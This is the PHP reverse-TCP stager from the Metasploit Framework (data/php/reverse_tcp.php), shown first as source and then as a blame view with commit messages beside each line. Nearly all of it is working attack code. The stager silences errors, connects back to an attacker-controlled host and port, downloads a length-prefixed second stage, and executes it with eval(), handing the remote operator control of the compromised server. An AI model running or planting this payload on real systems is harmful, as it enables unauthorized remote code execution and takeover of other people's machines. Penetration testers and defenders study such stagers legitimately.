metasploit-framework/data/php/reverse_tcp.php

#<?php

error_reporting(0);
# The payload handler overwrites this with the correct LHOST before sending
# it to the victim.
$ip = '127.0.0.1';
$port = 4444;
$ipf = AF_INET;

if (FALSE !== strpos($ip, ":")) {
	# ipv6 requires brackets around the address
	$ip = "[". $ip ."]";
	$ipf = AF_INET6;
}

if (($f = 'stream_socket_client') && is_callable($f)) {
	$s = $f("tcp://{$ip}:{$port}");
	$s_type = 'stream';
} elseif (($f = 'fsockopen') && is_callable($f)) {
	$s = $f($ip, $port);
	$s_type = 'stream';
} elseif (($f = 'socket_create') && is_callable($f)) {
	$s = $f($ipf, SOCK_STREAM, SOL_TCP);
	$res = @socket_connect($s, $ip, $port);
	if (!$res) { die(); }
	$s_type = 'socket';
} else {
	die('no socket funcs');
}
if (!$s) { die('no socket'); }

switch ($s_type) { 
case 'stream': $len = fread($s, 4); break;
case 'socket': $len = socket_read($s, 4); break;
}
if (!$len) {
	# We failed on the main socket.  There's no way to continue, so
	# bail
	die();
}
$a = unpack("Nlen", $len);
$len = $a['len'];

$b = '';
while (strlen($b) < $len) {
	switch ($s_type) { 
	case 'stream': $b .= fread($s, $len-strlen($b)); break;
	case 'socket': $b .= socket_read($s, $len-strlen($b)); break;
	}
}

# Set up the socket for the main stage to use.
$GLOBALS['msgsock'] = $s;
$GLOBALS['msgsock_type'] = $s_type;
eval($b);
die();
split stadpi out into an extension, add a reverse_tcp stager, make the main meterpreter stage-aware so it will work as a standalone or eval'd by a stager that sets $msgsock and $msgsock_type; see #2128 git-svn-id: file:///home/svn/framework3/trunk@9594 4d416f70-5f16-0410-b530-b9f4589650da 2010-06-23 20:00:27 +00:00			`#<?php`

move the stdapi constants into the stdapi extension to save a little space when php meterpreter is standalone git-svn-id: file:///home/svn/framework3/trunk@9939 4d416f70-5f16-0410-b530-b9f4589650da 2010-07-27 21:16:15 +00:00			`error_reporting(0);`
split stadpi out into an extension, add a reverse_tcp stager, make the main meterpreter stage-aware so it will work as a standalone or eval'd by a stager that sets $msgsock and $msgsock_type; see #2128 git-svn-id: file:///home/svn/framework3/trunk@9594 4d416f70-5f16-0410-b530-b9f4589650da 2010-06-23 20:00:27 +00:00			`# The payload handler overwrites this with the correct LHOST before sending`
			`# it to the victim.`
move the stdapi constants into the stdapi extension to save a little space when php meterpreter is standalone git-svn-id: file:///home/svn/framework3/trunk@9939 4d416f70-5f16-0410-b530-b9f4589650da 2010-07-27 21:16:15 +00:00			`$ip = '127.0.0.1';`
split stadpi out into an extension, add a reverse_tcp stager, make the main meterpreter stage-aware so it will work as a standalone or eval'd by a stager that sets $msgsock and $msgsock_type; see #2128 git-svn-id: file:///home/svn/framework3/trunk@9594 4d416f70-5f16-0410-b530-b9f4589650da 2010-06-23 20:00:27 +00:00			`$port = 4444;`
Merge in additional IPv6 support for PHP payloads 2012-01-31 07:11:55 +00:00			`$ipf = AF_INET;`

move the stdapi constants into the stdapi extension to save a little space when php meterpreter is standalone git-svn-id: file:///home/svn/framework3/trunk@9939 4d416f70-5f16-0410-b530-b9f4589650da 2010-07-27 21:16:15 +00:00			`if (FALSE !== strpos($ip, ":")) {`
split stadpi out into an extension, add a reverse_tcp stager, make the main meterpreter stage-aware so it will work as a standalone or eval'd by a stager that sets $msgsock and $msgsock_type; see #2128 git-svn-id: file:///home/svn/framework3/trunk@9594 4d416f70-5f16-0410-b530-b9f4589650da 2010-06-23 20:00:27 +00:00			`# ipv6 requires brackets around the address`
move the stdapi constants into the stdapi extension to save a little space when php meterpreter is standalone git-svn-id: file:///home/svn/framework3/trunk@9939 4d416f70-5f16-0410-b530-b9f4589650da 2010-07-27 21:16:15 +00:00			`$ip = "[". $ip ."]";`
Merge in additional IPv6 support for PHP payloads 2012-01-31 07:11:55 +00:00			`$ipf = AF_INET6;`
split stadpi out into an extension, add a reverse_tcp stager, make the main meterpreter stage-aware so it will work as a standalone or eval'd by a stager that sets $msgsock and $msgsock_type; see #2128 git-svn-id: file:///home/svn/framework3/trunk@9594 4d416f70-5f16-0410-b530-b9f4589650da 2010-06-23 20:00:27 +00:00			`}`
move the stdapi constants into the stdapi extension to save a little space when php meterpreter is standalone git-svn-id: file:///home/svn/framework3/trunk@9939 4d416f70-5f16-0410-b530-b9f4589650da 2010-07-27 21:16:15 +00:00
			`if (($f = 'stream_socket_client') && is_callable($f)) {`
			`$s = $f("tcp://{$ip}:{$port}");`
			`$s_type = 'stream';`
			`} elseif (($f = 'fsockopen') && is_callable($f)) {`
			`$s = $f($ip, $port);`
			`$s_type = 'stream';`
			`} elseif (($f = 'socket_create') && is_callable($f)) {`
Merge in additional IPv6 support for PHP payloads 2012-01-31 07:11:55 +00:00			`$s = $f($ipf, SOCK_STREAM, SOL_TCP);`
move the stdapi constants into the stdapi extension to save a little space when php meterpreter is standalone git-svn-id: file:///home/svn/framework3/trunk@9939 4d416f70-5f16-0410-b530-b9f4589650da 2010-07-27 21:16:15 +00:00			`$res = @socket_connect($s, $ip, $port);`
split stadpi out into an extension, add a reverse_tcp stager, make the main meterpreter stage-aware so it will work as a standalone or eval'd by a stager that sets $msgsock and $msgsock_type; see #2128 git-svn-id: file:///home/svn/framework3/trunk@9594 4d416f70-5f16-0410-b530-b9f4589650da 2010-06-23 20:00:27 +00:00			`if (!$res) { die(); }`
move the stdapi constants into the stdapi extension to save a little space when php meterpreter is standalone git-svn-id: file:///home/svn/framework3/trunk@9939 4d416f70-5f16-0410-b530-b9f4589650da 2010-07-27 21:16:15 +00:00			`$s_type = 'socket';`
split stadpi out into an extension, add a reverse_tcp stager, make the main meterpreter stage-aware so it will work as a standalone or eval'd by a stager that sets $msgsock and $msgsock_type; see #2128 git-svn-id: file:///home/svn/framework3/trunk@9594 4d416f70-5f16-0410-b530-b9f4589650da 2010-06-23 20:00:27 +00:00			`} else {`
move the stdapi constants into the stdapi extension to save a little space when php meterpreter is standalone git-svn-id: file:///home/svn/framework3/trunk@9939 4d416f70-5f16-0410-b530-b9f4589650da 2010-07-27 21:16:15 +00:00			`die('no socket funcs');`
split stadpi out into an extension, add a reverse_tcp stager, make the main meterpreter stage-aware so it will work as a standalone or eval'd by a stager that sets $msgsock and $msgsock_type; see #2128 git-svn-id: file:///home/svn/framework3/trunk@9594 4d416f70-5f16-0410-b530-b9f4589650da 2010-06-23 20:00:27 +00:00			`}`
move the stdapi constants into the stdapi extension to save a little space when php meterpreter is standalone git-svn-id: file:///home/svn/framework3/trunk@9939 4d416f70-5f16-0410-b530-b9f4589650da 2010-07-27 21:16:15 +00:00			`if (!$s) { die('no socket'); }`
split stadpi out into an extension, add a reverse_tcp stager, make the main meterpreter stage-aware so it will work as a standalone or eval'd by a stager that sets $msgsock and $msgsock_type; see #2128 git-svn-id: file:///home/svn/framework3/trunk@9594 4d416f70-5f16-0410-b530-b9f4589650da 2010-06-23 20:00:27 +00:00
move the stdapi constants into the stdapi extension to save a little space when php meterpreter is standalone git-svn-id: file:///home/svn/framework3/trunk@9939 4d416f70-5f16-0410-b530-b9f4589650da 2010-07-27 21:16:15 +00:00			`switch ($s_type) {`
			`case 'stream': $len = fread($s, 4); break;`
			`case 'socket': $len = socket_read($s, 4); break;`
split stadpi out into an extension, add a reverse_tcp stager, make the main meterpreter stage-aware so it will work as a standalone or eval'd by a stager that sets $msgsock and $msgsock_type; see #2128 git-svn-id: file:///home/svn/framework3/trunk@9594 4d416f70-5f16-0410-b530-b9f4589650da 2010-06-23 20:00:27 +00:00			`}`
			`if (!$len) {`
			`# We failed on the main socket. There's no way to continue, so`
			`# bail`
			`die();`
			`}`
			`$a = unpack("Nlen", $len);`
			`$len = $a['len'];`

move the stdapi constants into the stdapi extension to save a little space when php meterpreter is standalone git-svn-id: file:///home/svn/framework3/trunk@9939 4d416f70-5f16-0410-b530-b9f4589650da 2010-07-27 21:16:15 +00:00			`$b = '';`
			`while (strlen($b) < $len) {`
			`switch ($s_type) {`
			`case 'stream': $b .= fread($s, $len-strlen($b)); break;`
			`case 'socket': $b .= socket_read($s, $len-strlen($b)); break;`
split stadpi out into an extension, add a reverse_tcp stager, make the main meterpreter stage-aware so it will work as a standalone or eval'd by a stager that sets $msgsock and $msgsock_type; see #2128 git-svn-id: file:///home/svn/framework3/trunk@9594 4d416f70-5f16-0410-b530-b9f4589650da 2010-06-23 20:00:27 +00:00			`}`
			`}`

move the stdapi constants into the stdapi extension to save a little space when php meterpreter is standalone git-svn-id: file:///home/svn/framework3/trunk@9939 4d416f70-5f16-0410-b530-b9f4589650da 2010-07-27 21:16:15 +00:00			`# Set up the socket for the main stage to use.`
			`$GLOBALS['msgsock'] = $s;`
			`$GLOBALS['msgsock_type'] = $s_type;`
			`eval($b);`
split stadpi out into an extension, add a reverse_tcp stager, make the main meterpreter stage-aware so it will work as a standalone or eval'd by a stager that sets $msgsock and $msgsock_type; see #2128 git-svn-id: file:///home/svn/framework3/trunk@9594 4d416f70-5f16-0410-b530-b9f4589650da 2010-06-23 20:00:27 +00:00			`die();`